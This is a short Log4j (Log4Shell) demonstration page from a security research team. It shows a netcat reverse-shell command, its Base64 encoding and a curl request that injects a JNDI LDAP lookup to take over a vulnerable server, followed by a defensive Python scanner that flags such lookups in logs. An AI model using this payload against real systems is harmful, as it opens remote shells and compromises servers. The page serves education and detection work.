Log4j Demonstration

vulnerable server
malicious ldap server
netcat listener, listening for the remote shell
ldap://127.0.0.1:1389/Basic/Command/Base64/[base64_encoded_cmd]
nc 3.86.225.135 4444 -e /bin/sh
base64 encode the remote shell command
curl 52.23.211.253:8080 -H 'X-Api-Version: ${jndi:ldap://3.86.225.135:1389/Basic/Command/Base64/bmMgMy44Ni4yMjUuMTM1IDQ0NDQgLWUgL2Jpbi9zaA==}' 
launching the attack
errors on the vulnerable server
received the command
Profit! The server is owned.
ref: https://www.lunasec.io/docs/blog/log4j-zero-day/
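
For defenders, the request shown above leaves a recognisable trace wherever the X-Api-Version header is logged. The Python below is an added example, not code from the original post: it scans log lines for the ${jndi:...} lookup, reports the callback host and port, and decodes the Base64 command segment for triage. The log line layout and the names scan, decode_command and SAMPLE_LOG are assumptions; the second sample line reuses the header value from the curl request on this page.

```python
import base64
import re
from urllib.parse import unquote

# ${jndi:<scheme>://host[:port][/path]} as it appears in the request on this page
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)"
    r"(?::(?P<port>\d+))?(?P<path>/[^}\s]*)?\}",
    re.IGNORECASE,
)
B64_MARKER = "/Command/Base64/"

def decode_command(path):
    """Return the command carried after /Command/Base64/, or None."""
    if not path or B64_MARKER not in path:
        return None
    blob = path.split(B64_MARKER, 1)[1]
    blob += "=" * (-len(blob) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None

def scan(lines):
    """Return one finding per JNDI lookup seen in the given log lines."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        # unquote() so percent-encoded copies of the same string also match
        for m in JNDI_RE.finditer(unquote(line)):
            findings.append({
                "line": lineno,
                "scheme": m.group("scheme").lower(),
                "host": m.group("host"),
                "port": int(m.group("port")) if m.group("port") else None,
                "command": decode_command(m.group("path")),
            })
    return findings

# Constructed sample log lines (assumed format: request line, then the header)
SAMPLE_LOG = [
    "GET / HTTP/1.1 X-Api-Version: v2",
    "GET / HTTP/1.1 X-Api-Version: ${jndi:ldap://3.86.225.135:1389/Basic/"
    "Command/Base64/bmMgMy44Ni4yMjUuMTM1IDQ0NDQgLWUgL2Jpbi9zaA==}",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The decoded command and the callback address give responders the outbound host and port to look for in egress logs.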

VXRL

VXRL Team was founded by a group of enthusiastic security researchers who provide information security services and contribute to the community. https://www.vxrl.hk